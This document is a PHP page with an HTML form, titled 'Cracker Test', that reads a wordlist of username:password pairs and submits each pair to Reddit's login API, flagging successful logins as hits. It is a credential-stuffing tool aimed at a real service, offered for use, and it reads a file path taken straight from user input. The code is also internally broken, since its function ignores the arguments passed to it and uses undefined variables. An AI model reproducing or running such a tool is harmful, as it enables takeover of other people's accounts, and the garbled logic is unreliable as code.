<form method='POST'> <title>Cracker Test</title> <body style="backgroun

1. <form method='POST'>
2. <title>Cracker Test</title>
3. <body style="background-color: #000;">
4. <p align="center">
5. <center><font size="5" style="color: #FFF; font-weight:bold; font-family: verdana;">Cracker Test</center>
6. <center><input type="text" name="user" id="user" style="background-color: #FFF;"><br>Example: wordlist.txt<br>max 1.000 lines<br></center>
7. <p><center><input type="submit" value="Reset" name="scan"><br><br></center></p>
8. </form>
9. </body>
10. <?php
11. if(isset($_POST['user'])) {
12. crack();
13. }
14. foreach ($lines as $line) {
15.  
16. $readwordlist = $_POST['user'];
17. $lines = file($readwordlist);
18. foreach ($lines as $line) {
19. $combo = explode(':', $line);
20. $username = $combo[0];
21. $password = $combo[1];
22. crack($username, $password);
23. return $username;
24. return $password;
25. }
26. }
27. function crack() {
28. @set_time_limit(0);
29.  
30. $readwordlist = $_POST['user'];
31. $lines = file($readwordlist);
32. // Curl Function ^_^
33. $ch = curl_init();
34.  
35. $headarray = array(
36. 'Host: www.reddit.com',
37. 'Connection: keep-alive',
38. 'Accept: application/json, text/javascript, */*; q=0.01',
39. 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8',
40. 'Origin: https://www.reddit.com',
41. );
42.  
43. $options = array(
44. CURLOPT_URL => "https://www.reddit.com",
45. CURLOPT_HTTPHEADER => $headarray,
46. CURLOPT_FOLLOWLOCATION => true,
47. CURLOPT_CONNECTTIMEOUT => 20,
48. CURLOPT_TIMEOUT => 20,
49. CURLOPT_SSL_VERIFYHOST => false,
50. CURLOPT_SSL_VERIFYPEER => false,
51. CURLOPT_RETURNTRANSFER => true,
52. CURLOPT_COOKIEFILE => "",
53. CURLOPT_FRESH_CONNECT => true,
54. CURLOPT_REFERER => "https://www.reddit.com/",
55.  
56.  
57. );
58. curl_setopt_array($ch, $options);
59. $check = curl_exec($ch);
60. if (strpos($check, "reddit")) {
61. $check = "";
62. // Curl Function ^_^
63. $headarray = NULL;
64. $headarray = array(
65. 'Host: www.reddit.com',
66. 'Connection: keep-alive',
67. 'Accept: application/json, text/javascript, */*; q=0.01',
68. 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8',
69. 'Origin: https://www.reddit.com',
70. 'X-Requested-With: XMLHttpRequest',
71. );
72.  
73. curl_setopt($ch, CURLOPT_URL, "https://www.reddit.com/api/login/" . $combo[0]);
74. curl_setopt($ch, CURLOPT_HTTPHEADER, $headarray);
75. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
76. curl_setopt($ch, CURLOPT_REFERER, "https://www.reddit.com/");
77. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 20);
78. curl_setopt($ch, CURLOPT_TIMEOUT, 20);
79. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
80. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
81. curl_setopt($ch, CURLOPT_POSTFIELDS, "op=login-main&user=".$combo[0]."&passwd=".$combo[1]."&api_type=json");
82. curl_setopt($ch, CURLOPT_POST, 1);
83. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
84.  
85. //perform our request
86. $result = curl_exec($ch);
87. curl_close($ch);
88. if (strpos($result, "modhash")) {
89. echo "<br>Looks like a hit!<br>";
90. print_r($username . ":" . $password . "<br>");
91. return 2;
92. }
93.  
94. if (strpos($result, "INCORRECT_USERNAME_PASSWORD")) {
95. print_r($username . ":" . $password . "<br>");
96.  
97. return 1;
98. }
99. if (strpos($result, "WRONG_PASSWORD")) {
100. print_r($username . ":" . $password . "<br>");
101. return 1;
102. }
103.  
104.  
105. }
106. }
107.  
108. ?>